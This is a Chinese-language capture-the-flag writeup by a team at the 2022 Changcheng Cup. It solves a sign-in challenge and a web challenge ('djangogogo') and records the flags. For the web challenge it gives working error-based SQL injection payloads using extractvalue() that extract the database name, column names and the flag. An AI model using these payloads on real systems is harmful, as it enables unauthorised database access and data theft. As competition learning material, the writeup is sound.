2022.8.23 长城杯-花自飘零水自流队writeup
一、战队信息
战队名称:花自飘零水自流战队
战队排名:125
战队成员:yuezi2048、zz、stylite 、赤赤
二、解题情况
三、 解题过程
Misc-签名 签名簿
操作内容
点击提交后得到flag
flag值
flag{964dd030-d0cc-4387-bc5a-cbdc0773f590}
Web-dj djangogogo
操作内容
进入页面,发现flag in table FLAG,可能存在sql注入
extract,想到extractvalue()函数,即可能存在报错注入。
修改销售周期为month后 发现存在get传参请求
尝试引号闭合,发现报错
结合报错语句,发现from后面存在注入点。
构造payload如下
month FROM extractvalue('ljy666',concat('~',database()))));#
我们将其放入burpsuite中的repeater模块中发送,得到了报错语句如下
出现ctf数据库名称,表示报错注入可行。
由于一开始给出了表名,我们尝试爆FLAG表中的字段
year FROM extractvalue('ljy666',concat('~',(select group_concat(column_name) from information_schema.columns where table_name='FLAG')))));#
发现FLAG表中的FLAG字段
接着就可以爆值
构造的payload如下
year FROM extractvalue('ljy666',concat('~',(select mid(FLAG, 1, 30) from FLAG)))));#
year FROM extractvalue('ljy666',concat('~',(select mid(FLAG, 30, 30) from FLAG)))));#
拼接在一起后,得到最终的flag
flag值
flag{7d152999-1111-4c27-b734-6ad110a8ad2a}